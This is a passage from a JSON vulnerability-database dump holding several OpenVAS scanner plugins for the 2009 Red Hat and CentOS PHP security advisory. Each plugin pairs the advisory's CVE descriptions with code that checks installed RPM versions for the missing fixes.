A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-04-15T00:00:00", "id": "OPENVAS:63755", "href": "http://plugins.openvas.org/nasl.php?oid=63755", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0337", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0337.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0337 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63755);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0337\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0337.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880871", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880871", "type": "openvas", "title": "CentOS Update for php CESA-2009:0337 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-April/015722.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880871\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS3\");\n script_tag(name:\"affected\", value:\"php on CentOS 3\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n\n A flaw was found in the handling of the 'mbstring.func_overload'\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n\n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n\n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n\n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n 'background color' argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n\n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:39:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "The remote host is missing updates to php announced in\nadvisory CESA-2009:0337.", "modified": "2018-04-06T00:00:00", "published": "2009-04-15T00:00:00", "id": "OPENVAS:136141256231063827", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063827", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:0337 (php)", "sourceData": "#CESA-2009:0337 63827 8\n# $Id: ovcesa2009_0337.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:0337 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:0337\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:0337\nhttps://rhn.redhat.com/errata/RHSA-2009-0337.html\";\ntag_summary = \"The remote host is missing updates to php announced in\nadvisory CESA-2009:0337.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63827\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:0337 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-04-15T00:00:00", "id": "OPENVAS:136141256231063755", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063755", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0337", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0337.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0337 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63755\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0337\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0337.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", 